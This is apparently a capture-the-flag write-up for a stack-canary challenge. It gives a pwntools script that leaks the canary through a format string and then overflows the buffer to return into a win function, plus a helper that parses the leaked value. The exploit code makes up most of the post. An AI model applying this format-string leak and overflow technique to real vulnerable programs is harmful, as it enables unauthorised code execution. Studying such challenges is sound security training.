
qwq

Eddy夏祐,2026-03-11 14:09


A very simple canary challenge; just remember to use sendlineafter and to consume the blank line before receiving.


from pwn import *

p = remote('nc1.ctfplus.cn', 45876)
context.arch = 'amd64'
context.log_level = 'debug'   # was `log.level = 'debug'`, which pwntools does not honour

win = 0x00000000004011DB   # address of the win function
ret = 0x000000000040101a   # lone `ret` gadget, keeps the stack 16-byte aligned before win()

# Step 1: leak the canary through the format string read at the name prompt.
payload1 = b'%15$llx'
p.sendlineafter(b'name:', payload1)
p.recvline()                # swallow the empty line printed before the leaked value
canary_hex = p.recv(16)     # %llx prints the 8-byte canary as exactly 16 hex digits
canary = int(canary_hex, 16)
log.info("Canary:" + hex(canary))

# Step 2: fill the buffer, put the canary back in place, then return into win().
payload = b'a' * 72
payload += p64(canary)
payload += p64(ret)
payload += p64(win)
p.sendline(payload)

p.interactive()
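As an added illustration (not part of the original post), the receive discipline the author describes, written as a pure function so it can be checked offline against a constructed reply: the program echoes a blank line first, then the 16 hex digits produced by `%15$llx`. The helper also applies the usual sanity check that an x86-64 glibc stack canary ends in a zero byte, so a value that is not a canary at all is reported instead of silently used; the sample bytes and the canary value are made up.

```python
import re

# Constructed sample of what the remote program sends after the name is read:
# the blank line the post mentions, then the 16 hex digits from %15$llx.
# The canary value here is made up for this example.
SAMPLE_REPLY = b"\n1c3f5a7e9b2d4600\n"

HEX16 = re.compile(rb"^[0-9a-fA-F]{16}$")


def is_plausible_canary(value: int) -> bool:
    """x86-64 glibc canaries are 64-bit values whose lowest byte is always 0x00."""
    return 0 < value < (1 << 64) and (value & 0xFF) == 0


def parse_canary_leak(reply: bytes) -> int:
    """Return the leaked canary as an int, or raise ValueError.

    Mirrors the script above: the first (empty) line is dropped, then exactly
    16 hex characters are read, which is what p.recvline() followed by
    p.recv(16) does on the live connection. If the blank line were not
    consumed, the newline would land inside those 16 bytes and parsing fails.
    """
    lines = reply.split(b"\n")
    if len(lines) < 2:
        raise ValueError("expected a blank line before the leaked value")
    leaked = lines[1][:16]          # lines[0] is the blank line; the leak follows it
    if not HEX16.match(leaked):
        raise ValueError(f"not 16 hex digits: {leaked!r}")
    value = int(leaked, 16)
    if not is_plausible_canary(value):
        raise ValueError(f"{value:#018x} does not look like an x86-64 glibc canary")
    return value


if __name__ == "__main__":
    print(hex(parse_canary_leak(SAMPLE_REPLY)))
```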


